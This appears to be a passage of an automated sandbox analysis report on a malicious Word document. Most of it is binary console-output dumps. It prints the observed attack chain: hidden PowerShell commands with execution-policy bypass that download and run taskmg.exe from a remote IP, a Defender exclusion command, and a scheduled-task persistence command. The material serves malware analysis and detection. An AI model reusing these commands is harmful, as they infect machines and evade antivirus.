                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v2k....(P................W.............}..v.....P......0...............8.l.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................u2k......l...............W.............}..v....8W......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v2k.....W................W.............}..v....pX......0...............8.l.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.4.1.............}..v.....\......0.................l.....$.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v2k....8]................W.............}..v.....]......0...............8.l.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................u2k......l...............W.............}..v.....d......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v2k....8e................W.............}..v.....e......0...............8.l.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................u2k......l...............W.............}..v.....l......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v2k....8m................W.............}..v.....m......0...............8.l.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.t.a.s.k.m.g...e.x.e.'...............l.....D.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v2k....`s................W.............}..v.....s......0...............8.l.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................u2k......l...............W.............}..v.....z......0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v2k....`{................W.............}..v.....{......0...............8.l.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v............0.................l.....&.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v2k......................W.............}..v....0.......0...............8.l.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................u2k......l...............W.............}..v............0...............................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v2k......................W.............}..v....0.......0...............8.l.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0.................l.....<.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v2k....(.................W.............}..v............0...............8.l.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ........u2k......l...............W.............}..v....8.......0.................l.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v2k......................W.............}..v....p.......0...............8.l.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.......#.................7.....p.........7.......2.....`I4........v.....................K;.....................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#..................k......................W.............}..v............0...............H.^.............l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...8.......0.................^.....6.......l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../..................k......................W.............}..v....p.......0...............H.^.............l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.W.............}..v............0.................^.....".......l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;..................k....8.................W.............}..v............0...............H.^.............l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............v..k......^...............W.............}..v............0...............................l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G..................k....8.................W.............}..v............0...............H.^.............l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............v..k......^...............W.............}..v............0...............................l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S..................k....8.................W.............}..v............0...............H.^.............l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.......\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.t.a.s.k.m.g...e.x.e.'...............^.....D.......l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._..................k....`.................W.............}..v............0...............H.^.............l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............v..k......^...............W.............}..v............0...............................l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k..................k....X.................W.............}..v............0...............H.^.............l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.E.....w...............v..k......^...............W.............}..v............0.......................f.......l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w..................k......................W.............}..v....H.......0...............H.^.............l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......v..k......^...............W.............}..v............0.................^.............l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k......................W.............}..v............0...............H.^.............l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.E......................v.k......^...............W.............}..v.....R......0...............................l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................w.k....pS................W.............}..v.....S......0.................^.............l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v.k......^...............W.............}..v.....Z......0...............................l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................w.k....8[................W.............}..v.....[......0.................^.............l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.4.1.............}..v....._......0...............8.^.....$.......l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................w.k.....`................W.............}..v.....a......0.................^.............l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v.k......^...............W.............}..v.....g......0...............................l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................w.k.....h................W.............}..v.....i......0.................^.............l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v.k......^...............W.............}..v.....o......0...............................l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................w.k.....p................W.............}..v.....q......0.................^.............l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.t.a.s.k.m.g...e.x.e.'.............8.^.....D.......l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................w.k.....v................W.............}..v....(w......0.................^.............l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v.k......^...............W.............}..v.....}......0...............................l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................w.k.....~................W.............}..v....(.......0.................^.............l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v....@.......0...............8.^.....&.......l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................w.k......................W.............}..v....x.......0.................^.............l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v.k......^...............W.............}..v....@.......0...............................l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................w.k......................W.............}..v....x.......0.................^.............l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0...............8.^.....<.......l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................w.k....p.................W.............}..v............0.................^.............l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ........v.k......^...............W.............}..v............0...............8.^.............l...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................w.k....8.................W.............}..v............0.................^.............l...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....4...............T...............................0.......#.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....4...............T.......;.......................0.......#.........|.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....4...............T.......w.......................0......./.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....4...............T...............................0......./.........|.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....4...............P...............................0.......;...............|.......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....4...............P...............................0.......;.........|.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.........|.....".......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....4...............P.......2.......................0.......G.........|.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....4...............L.......].......................0.......S.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....4...............L.......x.......................0.......S.........|.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......Z...e.x.e.P.....4...............L...............................0......._.........|.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....4...............L...............................0......._.........|.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....4...............P...............................0.......k.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....4...............L...............................0.......k.........|.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.........|.....2.......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....4...............L.......N.......................0.......w.........|.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4...............L.......y.......................0.......................l.......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4...............P...............................0.................|.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....4...............L...............................0.................|.............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4...............L...............................0.................|.............................
                    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ..................%.............h.%.....(.P.....$.......................3.................................................................!.....
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\taskmg.exe "C:\Users\user\AppData\Roaming\taskmg.exe"
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmp
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess created: C:\Users\user\AppData\Roaming\taskmg.exe C:\Users\user\AppData\Roaming\taskmg.exe
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\taskmg.exe "C:\Users\user\AppData\Roaming\taskmg.exe"
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmp
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess created: C:\Users\user\AppData\Roaming\taskmg.exe C:\Users\user\AppData\Roaming\taskmg.exe
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD613.tmpJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeMutant created: \Sessions\1\BaseNamedObjects\CVJFnsnVFoXysEkzODvWP
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                    Source: 14.0.taskmg.exe.400000.13.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 14.0.taskmg.exe.400000.13.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 14.0.taskmg.exe.400000.9.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 14.0.taskmg.exe.400000.9.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 14.2.taskmg.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 14.2.taskmg.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbment.Automation.pdbBBX? source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.pdbV> source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.drInitial sample: OLE indicators vbamacros = False

                    Data Obfuscation:

                    barindex
                    .NET source code contains potential unpackerShow sources
                    Source: taskmg[1].exe.0.dr, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: taskmg.exe.3.dr, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: gZfDBpJYZ.exe.9.dr, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 9.0.taskmg.exe.12d0000.0.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 9.2.taskmg.exe.12d0000.1.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Suspicious powershell command line foundShow sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
